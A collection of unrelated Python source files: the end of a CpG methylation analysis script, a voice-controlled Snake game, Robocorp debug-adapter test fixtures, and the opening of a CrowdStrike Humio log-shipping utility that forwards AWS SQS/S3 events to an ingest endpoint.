call = record.samples[sample_no]
if call.is_het:
n_ref = call['DP4'][0] + call['DP4'][1]
n_alt = call['DP4'][2] + call['DP4'][3]
if n_ref >= args.min_per_allele and n_alt >= args.min_per_allele and (n_ref + n_alt) <= args.max_depth:
# record.POS-1 as VCFs are 1 based and everything is 0 based
CpGs = findCpGs(fafile, record.CHROM, record.POS-1, args.pair_distance)
# If SNP overlaps a CpG site, remove
for site in range(record.POS-2, record.POS+1):
if site in CpGs:
CpGs.remove(site)
if len(CpGs) > 0: # If there are any CpG sites in the vicinity
ref_reads, alt_reads = processSNP(record.CHROM, record.POS-1, record.REF,
record.ALT[0].sequence, args.min_mapping_quality, args.min_base_quality)
if len(ref_reads) + len(alt_reads) <= args.max_depth:
processReadsAtPosition(record.CHROM, record.POS-1, record.REF,
record.ALT[0].sequence, CpGs, ref_reads, alt_reads, args.min_per_allele,
args.min_sites_in_region)
else: ## CpG sites analysis
with gzip.open(args.input_file, "r") as f:
CpGreader = csv.DictReader(f)
if CpGreader.fieldnames != ['chr', 'position', 'M', 'U']:
sys.exit("Field names in %s must be 'chr,position,M,U'" % args.input_file)
for CpG in CpGreader:
if int(CpG["M"]) >= args.min_per_allele and int(CpG["U"]) >= args.min_per_allele and (int(CpG["M"]) + int(CpG["U"])) <= args.max_depth:
CpGs = findCpGs(fafile, CpG["chr"], int(CpG["position"]), args.pair_distance)
try:
CpGs.remove(int(CpG["position"])) # Remove the CpG site we are processing
except ValueError:
sys.exit("Input file CpG site at '%s:%s' is a '%s' in reference. Are you sure your input file coordinates are 0-based?" % (CpG["chr"], CpG["position"], fafile[CpG["chr"]][int(CpG["position"]):int(CpG["position"])+2]))
if len(CpGs) > 0: # If there are any other CpG sites in the vicinity
M_reads, U_reads = processCpG(CpG["chr"], int(CpG["position"]),
args.min_mapping_quality, args.min_base_quality)
if len(M_reads) + len(U_reads) <= args.max_depth:
processReadsAtPosition(CpG["chr"], int(CpG["position"]), "M", "U", CpGs,
M_reads, U_reads, args.min_per_allele, args.min_sites_in_region)
# Close down IGV process
if args.IGV_screenshot:
IGV_queue.put("DONE")
print("Waiting for IGV screenshots process to finish")
reader_process.join()
# close files
samfile.close()
out_sites.close()
out_regions.close()
if __name__ == '__main__':
main()
|
run_hearing_snake.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import json
import os
from random import randint
from threading import Thread
import time
import model
import pygame
from pygame.locals import *
import queue
APPLE_COLOR = pygame.Color('red')
SNAKE_COLOR = pygame.Color(32, 168, 0, 255)
GAMEOVER_TEXT_COLOR = pygame.Color('yellow')
GAMESTART_TEXT_COLOR = pygame.Color('yellow')
SCORE_TEXT_COLOR = pygame.Color('magenta')
NUMBER_OF_SCORES_TO_KEEP = 10
class Apple:
x = 0
y = 0
size = 30
step = size
color = APPLE_COLOR
_apple_image = None
_start_x = 5
_start_y = 5
_display_width = -1
_display_height = -1
def __init__(self, display_width, display_height):
self.x = self._start_x * self.step
self.y = self._start_y * self.step
self._display_width = display_width
self._display_height = display_height
self._apple_image = pygame.image.load(
'pygame_images/apple.png').convert_alpha()
def draw(self, surface):
if self._apple_image is not None:
surface.blit(self._apple_image, (self.x, self.y))
else:
pygame.draw.rect(surface, self.color,
(self.x, self.y, self.size, self.size), 0)
def respan(self):
# generate next apple position by keeping a border where we don't want
# the apple to appear
border = 2
width_bound = int(round(self._display_width / self.size)) - border
height_bound = int(round(self._display_height / self.size)) - border
self.x = randint(border, width_bound) * self.size
self.y = randint(border, height_bound) * self.size
class Player:
x = [0]
y = [0]
block_size = 30
step = block_size
color = SNAKE_COLOR
_direction = 0
length = 3
traveled_dist = 0
_display_width = -1
_display_height = -1
_snake_head_left = None
_snake_head_right = None
_snake_head_up = None
_snake_head_down = None
_snake_head_image_width = 0
_snake_head_image_height = 0
_snake_tail_left = None
_snake_tail_right = None
_snake_tail_up = None
_snake_tail_down = None
_update_count_max = 2
_update_count = 0
_need_immediate_pos_update = False
def __init__(self, length, display_width, display_height):
self._display_width = display_width
self._display_height = display_height
self._snake_head_right = pygame.image.load(
'pygame_images/snake_head_with_ears.png').convert_alpha()
self._snake_head_left = pygame.transform.rotate(self._snake_head_right, 180)
self._snake_head_up = pygame.transform.rotate(self._snake_head_right, 90)
self._snake_head_down = pygame.transform.rotate(self._snake_head_right, 270)
self._snake_tail_right = pygame.image.load(
'pygame_images/snake_tail.png').convert_alpha()
self._snake_tail_left = pygame.transform.rotate(self._snake_tail_right, 180)
self._snake_tail_up = pygame.transform.rotate(self._snake_tail_right, 90)
self._snake_tail_down = pygame.transform.rotate(self._snake_tail_right, 270)
self.restart(length)
def restart(self, length):
self.length = length
self._update_count = 0
self._direction = 0
self.x = [0]
self.y = [0]
for _ in range(0, 2000):
self.x.append(-100)
self.y.append(-100)
# initial positions, no collision.
self.x[1] = -1 * self.block_size
self.x[2] = -2 * self.block_size
self.y[1] = 0
self.y[2] = 0
self._direction = 0
self._snake_head_image = self._snake_head_right
self._snake_head_image_width = self._snake_head_image.get_rect().width
self._snake_head_image_height = self._snake_head_image.get_rect().height
self._snake_tail_image = self._snake_tail_right
self.update()
def update(self):
self._update_count = self._update_count + 1
if self._need_immediate_pos_update or self._update_count > self._update_count_max:
self.update_position_immediately()
self._update_count = 0
self._need_immediate_pos_update = False
def update_position_immediately(self):
# update previous positions
for i in range(self.length - 1, 0, -1):
self.x[i] = self.x[i - 1]
self.y[i] = self.y[i - 1]
# update position of head of snake
if self._direction == 0:
self.x[0] = self.x[0] + self.step
if self.x[0] > self._display_width:
self.x[0] = self.x[0] - self._display_width - self.step
if self._direction == 1:
self.x[0] = self.x[0] - self.step
if self.x[0] < 0:
self.x[0] += self._display_width
if self._direction == 2:
self.y[0] = self.y[0] - self.step
if self.y[0] < 0:
self.y[0] += self._display_height
if self._direction == 3:
self.y[0] = self.y[0] + self.step
if self.y[0] > self._display_height:
self.y[0] = self.y[0] - self._display_height - self.step
# update traveled distance
self.traveled_dist += self.step
def move_right(self):
if self._direction != 1 and self._direction != 0:
self._direction = 0
self._need_immediate_pos_update = True
def move_left(self):
if self._direction != 0 and self._direction != 1:
self._direction = 1
self._need_immediate_pos_update = True
def move_up(self):
if self._direction != 3 and self._direction != 2:
self._direction = 2
self._need_immediate_pos_update = True
def move_down(self):
if self._direction != 2 and self._direction != 3:
self._direction = 3
self._need_immediate_pos_update = True
def grow(self):
self.length += 1
def draw(self, surface):
length = self.length
for i in range(length - 1, -1, -1):
if i == 0:
if self._direction == 0 or self._direction == 1:
x = self.x[i]
y = self.y[i] - round(self._snake_head_image_height / 2 -
self.block_size / 2)
if self._direction == 0 and (x > self.x[i + 1] or (self.x[i + 1] - x) > self._display_width / 2):
surface.blit(self._snake_head_right, (x, y))
elif self._direction == 1 and (x < self.x[i + 1] or (x - self.x[i + 1]) > self._display_width / 2):
surface.blit(self._snake_head_left, (x, y))
else:
x = self.x[i] - round(self._snake_head_image_height / 2 -
self.block_size / 2)
y = self.y[i]
if self._direction == 2 and (y < self.y[i + 1] or (y - self.y[i + 1]) > self._display_height / 2):
surface.blit(self._snake_head_up, (x, y))
elif self._direction == 3 and (y > self.y[i + 1] or (self.y[i + 1] - y) < self._display_height / 2):
surface.blit(self._snake_head_down, (x, y))
elif i == length - 1:
x = self.x[i]
y = self.y[i]
if x < self.x[i - 1]:
surface.blit(self._snake_tail_right, (x, y))
elif x > self.x[i - 1]:
surface.blit(self._snake_tail_left, (x, y))
elif y < self.y[i - 1]:
surface.blit(self._snake_tail_down, (x, y))
elif y > self.y[i - 1]:
surface.blit(self._snake_tail_up, (x, y))
else:
pygame.draw.rect(
surface, self.color,
(self.x[i], self.y[i], self.block_size, self.block_size), 0)
def is_collision(self, block_index):
if self.x[0] >= self.x[block_index] and self.x[
0] < self.x[block_index] + self.block_size:
if self.y[0] >= self.y[block_index] and self.y[
0] < self.y[block_index] + self.block_size:
return True
return False
class Game:
player = None
apple = None
_display_width = -1
_display_height = -1
_gamestarted = False
_gameover = False
best_scores = [0] * NUMBER_OF_SCORES_TO_KEEP
score = 0
_coef = 1
_snake_to_apple_dist = -1
_gameover_text = ''
def __init__(self, display_width, display_height):
self._display_width = display_width
self._display_height = display_height
self.player = Player(3, display_width, display_height)
self.apple = Apple(display_width, display_height)
self._update_player_to_apple_dist()
self._gameover_text = 'Say \'launch game\' to start the game!\n'
self._gameover_text += '\nControls: You can say any of\n\n'
for d in ["up", "down", "left", "right"]:
self._gameover_text += '\'move %s\', \'go %s\' ' % (d, d)
self._gameover_text += 'or \'turn %s\'\n' % (d)
self._gameover_text += '\n\n to control your snake.'
def _update_gameover_text(self):
self._gameover_text = ''
if self.score > self.best_scores[0]:
self._gameover_text = 'You\'ve beaten the best score with {} points!!!'.format(
self.score)
self.best_scores.insert(0, self.score)
self.best_scores = self.best_scores[0:NUMBER_OF_SCORES_TO_KEEP]
elif self.score > self.best_scores[len(self.best_scores) - 1]:
rank = NUMBER_OF_SCORES_TO_KEEP
for rank, best_score in enumerate(self.best_scores):
if self.score > best_score:
break
self.best_scores.insert(rank, self.score)
self.best_scores = self.best_scores[0:NUMBER_OF_SCORES_TO_KEEP]
self._gameover_text = ('You\'ve entered the hall of fame with {} points '
'at rank {}!').format(self.score, rank + 1)
else:
self._gameover_text = 'You lose! Your score: {} points.'.format(
self.score)
self._gameover_text += '\n' + self._best_scores_to_text()
self._gameover_text += '\n\nSay \'launch game\' to start over!'
def start(self):
self._gameover = False
self._gamestarted = True
def started(self):
return self._gamestarted and not self._gameover
def gameover(self):
self._gameover = True
self._gamestarted = False
self._update_gameover_text()
self.score = 0
self._coef = 1
self.player.restart(length=3)
def render_gameover_text(self, surface):
font = pygame.font.Font('freesansbold.ttf', 20)
rects = []
rendered_texts = []
for i, part in enumerate(self._gameover_text.split('\n')):
rendered_texts.append(font.render(part, True, GAMEOVER_TEXT_COLOR))
rects.append(rendered_texts[i].get_rect())
total_height = 0
for rect in rects:
total_height += rect.height
starting_y = self._display_height / 2 - total_height / 2
for i, rect in enumerate(rects):
rect.center = (self._display_width / 2, starting_y)
starting_y += rect.height
surface.blit(rendered_texts[i], rect)
def is_collision_rect_to_rect(self, x1, y1, size1, x2, y2, size2):
if x1 + size1 > x2 and x1 < x2 + size2 and y1 + size1 > y2 and y1 < y2 + size2:
return True
return False
def _update_player_to_apple_dist(self):
self._snake_to_apple_dist = abs(self.player.x[0] -
self.apple.x) + abs(self.player.y[0] -
self.apple.y)
def _update_score(self):
# additional points if the distance traveled is optimized
dist_coef = self._snake_to_apple_dist / self.player.traveled_dist
# linear increase of points w.r.t the snake's length
length_coef = self.player.length * 0.33
self.score += round(length_coef) + round(dist_coef)
def _best_scores_to_text(self):
text = ''
rank = ''
for idx, score in enumerate(self.best_scores):
if score == 0:
break
if idx == 0:
rank = '1st'
elif idx == 1:
rank = '2nd'
elif idx == 2:
rank = '3rd'
else:
rank = '{}th'.format(idx + 1)
text += '{}: {} points\n'.format(rank, score)
return text
def eat_apple(self):
# play sound
# pygame.mixer.music.load('audio/eat.mp3')
# pygame.mixer.music.play(0)
# snake ate apple, update the score
self._update_score()
# reset player
self.player.traveled_dist = 0
self.apple.respan()
self._update_player_to_apple_dist()
self.player.grow()
self.player.update_position_immediately()
def update(self):
self.player.update()
# does snake eat apple?
for i in range(0, self.player.length):
if self.is_collision_rect_to_rect(self.apple.x, self.apple.y,
self.apple.size, self.player.x[i],
self.player.y[i],
self.player.block_size):
self.eat_apple()
# does snake collide with itself?
for i in range(2, self.player.length):
if self.player.is_collision(i):
self.gameover()
def draw(self, surface):
self.player.draw(surface)
self.apple.draw(surface)
if self._gameover or not self._gamestarted:
self.render_gameover_text(surface)
class Controler(object):
def __init__(self, q):
self._q = q
def callback(self, command):
self._q.put(command)
class App:
window_width = 800
window_height = 600
def __init__(self):
self._running = True
self._display_text = None
self._display_text_rect = None
self._display_score = None
self._display_score_rect = None
self._display_surf = None
self._metadata_file = 'hearing_snake_metadata.json'
self._metadata_data = None
self._bg_image = None
def on_init(self):
pygame.init()
self._display_surf = pygame.display.set_mode(
(self.window_width, self.window_height), pygame.HWSURFACE)
pygame.display.set_caption('The Hearing Snake')
self.game = Game(self.window_width, self.window_height)
img = pygame.image.load('pygame_images/bg.jpg')
img = pygame.transform.scale(img, (self.window_width, self.window_height))
self._bg_image = img.convert()
self.on_load_metadata()
self._running = True
return True
def on_load_metadata(self):
script_dir = os.path.dirname(os.path.realpath(__file__))
metadata_file_path = os.path.join(script_dir, self._metadata_file)
if not os.path.isfile(metadata_file_path):
self._metadata_data = {}
self._metadata_data['version'] = 1.0
with open(metadata_file_path, 'w') as outfile:
json.dump(self._metadata_data, outfile, indent=4)
else:
with open(metadata_file_path) as json_file:
self._metadata_data = json.load(json_file)
if 'best_scores' in self._metadata_data:
self.game.best_scores = self._metadata_data['best_scores']
else:
self.game.best_score = []
self.game.best_scores.sort(
reverse=True) # descending order, best score first
def on_save_metadata(self):
script_dir = os.path.dirname(os.path.realpath(__file__))
metadata_file_path = os.path.join(script_dir, self._metadata_file)
self._metadata_data['best_scores'] = self.game.best_scores
with open(metadata_file_path, 'w') as outfile:
json.dump(self._metadata_data, outfile, indent=4)
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
def on_loop(self):
self.game.update()
def on_display_score(self, color):
font = pygame.font.Font('freesansbold.ttf', 20)
self._display_score = font.render('Score: {}'.format(self.game.score), True,
color, None)
self._display_score_rect = self._display_score.get_rect()
self._display_score_rect = (self.window_width -
self._display_score_rect.width - 10, 10)
self._display_surf.blit(self._display_score, self._display_score_rect)
def on_render(self):
self._display_surf.blit(self._bg_image, [0, 0])
self.game.draw(self._display_surf)
self.on_display_score(SCORE_TEXT_COLOR)
pygame.display.flip()
def on_cleanup(self):
self.on_save_metadata()
pygame.quit()
def spotter(self, args):
interpreter = model.make_interpreter(args.model_file)
interpreter.allocate_tensors()
mic = args.mic if args.mic is None else int(args.mic)
model.classify_audio(mic, interpreter,
labels_file="config/labels_gc2.raw.txt",
commands_file="config/commands_v2_snake.txt",
dectection_callback=self._controler.callback,
sample_rate_hz=int(args.sample_rate_hz),
num_frames_hop=int(args.num_frames_hop))
def on_execute(self, args):
if not self.on_init():
self._running = False
q = model.get_queue()
self._controler = Controler(q)
if not args.debug_keyboard:
t = Thread(target=self.spotter, args=(args,))
t.daemon = True
t.start()
item = -1
while self._running:
pygame.event.pump()
if args.debug_keyboard:
keys = pygame.key.get_pressed()
else:
try:
new_item = q.get(True, 0.1)
except queue.Empty:
new_item = None
if new_item is not None:
item = new_item
if (args.debug_keyboard and keys[pygame.K_ESCAPE]) or item == "stop":
self._running = False
if (args.debug_keyboard and keys[pygame.K_SPACE]) or item == "go":
self.game.start()
if self.game.started():
if (args.debug_keyboard and keys[pygame.K_RIGHT]) or item == "right":
self.game.player.move_right()
if (args.debug_keyboard and keys[pygame.K_LEFT]) or item == "left":
self.game.player.move_left()
if (args.debug_keyboard and keys[pygame.K_UP]) or item == "up":
self.game.player.move_up()
if (args.debug_keyboard and keys[pygame.K_DOWN]) or item == "down":
self.game.player.move_down()
self.on_loop()
self.on_render()
time.sleep(0.05)
self.on_cleanup()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--debug_keyboard',
help='Use the keyboard to control the game.',
action='store_true',
default=False)
model.add_model_flags(parser)
args = parser.parse_args()
the_app = App()
the_app.on_execute(args)
|
fixtures.py
|
# coding: utf-8
# Original work Copyright Fabio Zadrozny (EPL 1.0)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robocorp_ls_core.subprocess_wrapper import subprocess
import queue
import threading
import pytest # type: ignore
import sys
import os
from typing import Optional, Iterable
from robocorp_ls_core.options import DEFAULT_TIMEOUT
__file__ = os.path.abspath(__file__)
if __file__.endswith((".pyc", ".pyo")):
__file__ = __file__[:-1]
@pytest.fixture
def dap_logs_dir(tmpdir):
import locale
logs_directory = tmpdir.join("logs_adapter")
logs_directory.mkdir()
yield logs_directory
for name in os.listdir(str(logs_directory)):
sys.stderr.write("\n--- %s contents:\n" % (name,))
if name in ("output.xml", "report.html", "log.html"):
sys.stderr.write("--- Not printed --- \n\n")
continue
with open(str(logs_directory.join(name)), "rb") as stream:
contents = stream.read().decode(locale.getpreferredencoding(), "replace")
sys.stderr.write(contents)
sys.stderr.write("\n\n")
@pytest.fixture
def dap_log_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robocorp_code_dap_tests.log"))
sys.stderr.write("Logging subprocess to: %s\n" % (filename,))
yield filename
@pytest.fixture
def dap_process_stderr_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robocorp_code_dap_tests_stderr.log"))
sys.stderr.write("Output subprocess stderr to: %s\n" % (filename,))
with open(filename, "wb") as stream:
yield stream
@pytest.fixture
def dap_process(dap_log_file, dap_process_stderr_file):
from robocorp_code_debug_adapter import __main__
from robocorp_ls_core.basic import kill_process_and_subprocesses
env = os.environ.copy()
env["ROBOCORP_CODE_DAP_LOG_LEVEL"] = "3"
env["ROBOCORP_CODE_DAP_LOG_FILENAME"] = dap_log_file
dap_process = subprocess.Popen(
[sys.executable, "-u", __main__.__file__],
stdout=subprocess.PIPE,
stderr=dap_process_stderr_file,
stdin=subprocess.PIPE,
env=env,
)
assert dap_process.returncode is None
yield dap_process
if dap_process.returncode is None:
kill_process_and_subprocesses(dap_process.pid)
class _DebuggerAPI(object):
def __init__(
self,
reader=None,
writer=None,
write_queue=None,
read_queue=None,
dap_resources_dir=None,
):
self.reader = reader
self.writer = writer
self.write_queue = write_queue
self.read_queue = read_queue
self.all_messages_read = []
self.target = None
self.dap_resources_dir = dap_resources_dir
def write(self, msg):
"""
:param BaseSchema msg:
The message to be written.
"""
self.write_queue.put(msg)
return msg
def read(self, expect_class=None, accept_msg=None, timeout=TIMEOUT):
"""
Waits for a message and returns it (may throw error if there's a timeout waiting for the message).
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
while True:
msg = self.read_queue.get(timeout=timeout)
if hasattr(msg, "to_dict"):
sys.stderr.write("Read: %s\n\n" % (msg.to_dict(),))
else:
sys.stderr.write("Read: %s\n\n" % (msg,))
self.all_messages_read.append(msg)
if expect_class is not None or accept_msg is not None:
if self._matches(msg, expect_class, accept_msg):
return msg
# Only skip OutputEvent. Other events must match.
if not isinstance(msg, OutputEvent):
raise AssertionError(
"Received: %s when expecting: %s" % (msg, expect_class)
)
else:
# expect_class and accept_msg are None
return msg
return msg
def assert_message_found(self, expect_class=None, accept_msg=None):
for msg in self.all_messages_read:
if self._matches(msg, expect_class, accept_msg):
return True
raise AssertionError("Did not find expected message.")
def _matches(self, msg, expect_class=None, accept_msg=None):
if (expect_class is None or isinstance(msg, expect_class)) and (
accept_msg is None or accept_msg(msg)
):
return True
return False
def get_dap_case_file(self, filename, must_exist=True):
import os.path
ret = os.path.join(self.dap_resources_dir, filename)
if must_exist:
assert os.path.exists(ret), "%s does not exist." % (ret,)
return ret
def initialize(self, rcc_config_location):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializeRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeResponse,
)
self.write(
InitializeRequest(
InitializeRequestArguments(
adapterID="robocorp-code-adapter",
clientID="Stub",
clientName="stub",
locale="en-us",
linesStartAt1=True,
columnsStartAt1=True,
pathFormat="path",
supportsVariableType=True,
supportsVariablePaging=True,
supportsRunInTerminalRequest=True,
rccConfigLocation=rcc_config_location,
)
)
)
initialize_response = self.read(InitializeResponse)
assert isinstance(initialize_response, InitializeResponse)
assert initialize_response.request_seq == 0
assert initialize_response.success
assert initialize_response.command == "initialize"
def configuration_done(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneResponse,
)
self.write(ConfigurationDoneRequest())
self.read(ConfigurationDoneResponse)
def launch(
self,
robot,
task,
debug=False,
success=True,
terminal="none",
args: Optional[Iterable[str]] = None,
environ: Optional[dict] = None,
):
"""
:param args:
The arguments to the launch (for instance:
["--variable", "my_var:22"]
)
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
LaunchRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializedEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
launch_args = LaunchRequestArguments(
__sessionId="some_id",
noDebug=not debug,
robot=robot,
task=task,
terminal=terminal,
)
if args:
launch_args.kwargs["args"] = args
if environ:
launch_args.kwargs["env"] = environ
self.write(LaunchRequest(launch_args))
if success:
# Initialized is sent just before the launch response (at which
# point it's possible to send breakpoints).
event = self.read(InitializedEvent, timeout=10 * 60)
assert isinstance(event, InitializedEvent)
if success:
launch_response = self.read(LaunchResponse)
else:
launch_response = self.read(Response)
assert launch_response.success == success
def list_threads(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ThreadsRequest
return self.wait_for_response(self.write(ThreadsRequest()))
def set_breakpoints(self, target, lines):
import os.path
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Source
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import SourceBreakpoint
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsResponse,
)
if isinstance(lines, int):
lines = (lines,)
assert isinstance(lines, (list, tuple))
self.write(
SetBreakpointsRequest(
SetBreakpointsArguments(
source=Source(name=os.path.basename(target), path=target),
lines=lines,
breakpoints=[
SourceBreakpoint(line=line).to_dict() for line in lines
],
)
)
)
response = self.read(SetBreakpointsResponse)
assert len(response.body.breakpoints) == len(lines)
def wait_for_response(self, request, response_class=None):
from robocorp_ls_core.debug_adapter_core.dap.dap_base_schema import (
get_response_class,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
if response_class is None:
response_class = get_response_class(request)
def accept_message(response):
if isinstance(request, dict):
if response.request_seq == request["seq"]:
return True
else:
if response.request_seq == request.seq:
return True
return False
return self.read((response_class, Response), accept_message)
@pytest.fixture(scope="session")
def dap_resources_dir(tmpdir_factory):
from robocorp_ls_core.copytree import copytree_dst_exists
basename = u"dap áéíóú"
copy_to = str(tmpdir_factory.mktemp(basename))
f = __file__
original_resources_dir = os.path.join(os.path.dirname(f), u"_dap_resources")
assert os.path.exists(original_resources_dir)
copytree_dst_exists(original_resources_dir, copy_to)
resources_dir = copy_to
assert os.path.exists(resources_dir)
return resources_dir
@pytest.fixture
def debugger_api_core(dap_resources_dir):
return _DebuggerAPI(dap_resources_dir=dap_resources_dir)
@pytest.fixture
def debugger_api(dap_process, dap_resources_dir):
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import writer_thread
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import reader_thread
write_to = dap_process.stdin
read_from = dap_process.stdout
write_queue = queue.Queue()
read_queue = queue.Queue()
writer = threading.Thread(
target=writer_thread, args=(write_to, write_queue), name="Debugger API writer"
)
writer.daemon = True
reader = threading.Thread(
target=reader_thread,
args=(read_from, read_queue.put, read_queue),
name="Debugger API reader",
)
reader.daemon = True
reader.start()
writer.start()
return _DebuggerAPI(
reader=reader,
writer=writer,
write_queue=write_queue,
read_queue=read_queue,
dap_resources_dir=dap_resources_dir,
)
def dbg_wait_for(condition, msg=None, timeout=DEFAULT_TIMEOUT, sleep=1 / 20.0):
from robocorp_ls_core.basic import wait_for_condition
if "pydevd" in sys.modules:
timeout = sys.maxsize
wait_for_condition(condition, msg, timeout, sleep)
|
logshipper.py
|
"""Humio Log Shipping utility.
___ ___ __
| Y .--.--.--------|__.-----.
|. 1 | | | | | _ |
|. _ |_____|__|__|__|__|_____|
|: | |
|::.|:. | Log Connector
`--- ---'
Creation date: 10.12.2022 - ckachigian@CrowdStrike, nkhetia31@CrowdStrike, kylesmartin@CrowdStrike
Modified: 01.20.2022 - nkhetia31@CrowdStrike, jshcodes@CrowdStrike, redhatrises@CrowdStrike
"""
import configparser
import json
import gzip
from io import BytesIO
import sys
import os
import logging
from logging.handlers import RotatingFileHandler
import threading
from pathlib import Path
import time
import glob
import hashlib
import socket
import signal
import mmap
import urllib3
import boto3
from google.cloud import pubsub_v1
# Configure logging.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
log_handle = RotatingFileHandler('logshipper.log', maxBytes=2048000, backupCount=5)
log_handle.setLevel(logging.DEBUG)
log_handle.setFormatter(formatter)
logger.addHandler(log_handle)
hostname = socket.getfqdn()
# add OS identification, hostname, ip address automatically
class FDR2Humio(threading.Thread): # pylint: disable=R0902
"""FDR2Humio class."""
def __init__(self, # pylint: disable=R0913
a_key,
s_key,
sqs_q,
rgn,
dest_url,
dest_token,
name="crwd-fdr",
):
"""Initialize the object."""
threading.Thread.__init__(self)
self.name = name
self.a_key = a_key
self.s_key = s_key
self.sqs_q = sqs_q
self.rgn = rgn
self.dest_url = dest_url
self.dest_token = dest_token
self.sqs_client = boto3.client('sqs',
region_name=self.rgn,
aws_access_key_id=self.a_key,
aws_secret_access_key=self.s_key
)
self.s3_client = boto3.client("s3",
region_name=self.rgn,
aws_access_key_id=self.a_key,
aws_secret_access_key=self.s_key
)
self.http = urllib3.PoolManager()
self.killed = False
def run(self):
"""Start the thread."""
logger.debug('Starting %s', self.name)
while not self.killed:
sub_threads = []
for _ in range(20): # Might want to make thread count an adjustable variable
try:
bucket1, key1, handle1 = self.get_location()
if bucket1 and key1:
subthread = threading.Thread(target=self.read_events, args=[bucket1, key1, handle1])
sub_threads.append(subthread)
subthread.start()
except Exception as erred:
logger.debug(erred)
break
time.sleep(5)
for sub_thread in sub_threads:
sub_thread.join()
logger.debug("Stopping %s", self.name)
def read_events(self, bucket2, key2, handle2):
"""Event reader sub-processing thread handler."""
self.ingest_event(json.loads(self.get_content(bucket2, key2)))
logger.debug("file: %s", str(key2))
self.delete_message(handle2)
def get_location(self):
"""Retrieve the S3 location from the SQS message."""
response = self.sqs_client.receive_message(QueueUrl=self.sqs_q, WaitTimeSeconds=10,
VisibilityTimeout=300, MaxNumberOfMessages=1)
message = response['Messages'][0]
mbody = json.loads(message['Body'])
return mbody['bucket'], mbody['files'][0]['path'], message['ReceiptHandle']
def get_content(self, bucket1, key1):
"""Read in the gzip'd message."""
response = self.s3_client.get_object(Bucket=bucket1, Key=key1)
with gzip.GzipFile(fileobj=response["Body"]) as gzipfile:
json_file = json.dumps(gzipfile.read().decode('utf-8'))
return json_file
def delete_message(self, handle1):
"""Delete the message from the SQS queue."""
return self.sqs_client.delete_message(QueueUrl=self.sqs_q, ReceiptHandle=handle1)
def ingest_event(self, record1):
"""Ingest the parsed event."""
return self.http.request("POST",
self.dest_url,
body=record1.encode('utf-8'),
headers={"Content-Type": "application/json", "Authorization": "Bearer"
+ self.dest_token})
def kill(self):
"""Set the kill flag."""
self.killed = True
class CloudTrail(threading.Thread):
"""AWS CloudTrail class."""
def __init__(self,
a_key,
s_key,
sqs_q,
rgn,
dest_url,
dest_token,
name="aws-cloudtrail",
):
"""Initialize the CloudTrail object."""
threading.Thread.__init__(self)
self.name = name
self.a_key = a_key
self.s_key = s_key
self.sqs_q = sqs_q
self.rgn = rgn
self.dest_url = dest_url
self.dest_token = dest_token
self.sqs_client = boto3.client('sqs',
region_name=self.rgn,
aws_access_key_id=self.a_key,
aws_secret_access_key=self.s_key
)
self.s3_client = boto3.client("s3",
region_name=self.rgn,
aws_access_key_id=self.a_key,
aws_secret_access_key=self.s_key
)
self.http = urllib3.PoolManager()
self.killed = False
def run(self):
"""Start the thread."""
logger.debug('Starting %s', self.name)
while not self.killed:
sub_threads = []
for _ in range(50): # Might want to make thread count an adjustable variable
try:
bucket1, key1, handle1 = self.get_location()
subthread = threading.Thread(target=self.read_events, args=[bucket1, key1, handle1])
sub_threads.append(subthread)
subthread.start()
except Exception as erred:
logger.debug(erred)
break
time.sleep(5)
for sub_thread in sub_threads:
sub_thread.join()
logger.debug("Stopping %s", self.name)
def read_events(self, bucket2, key2, handle2):
"""Event reader sub-processing thread handler."""
reccount = 0
for record in self.get_content(bucket2, key2):
_ = self.ingest_event(json.dumps(record))
reccount = reccount + 1
logger.debug("file: %s events: %s", str(key2), str(reccount))
self.delete_message(handle2)
def get_location(self):
"""Retrieve the S3 location from the SQS message."""
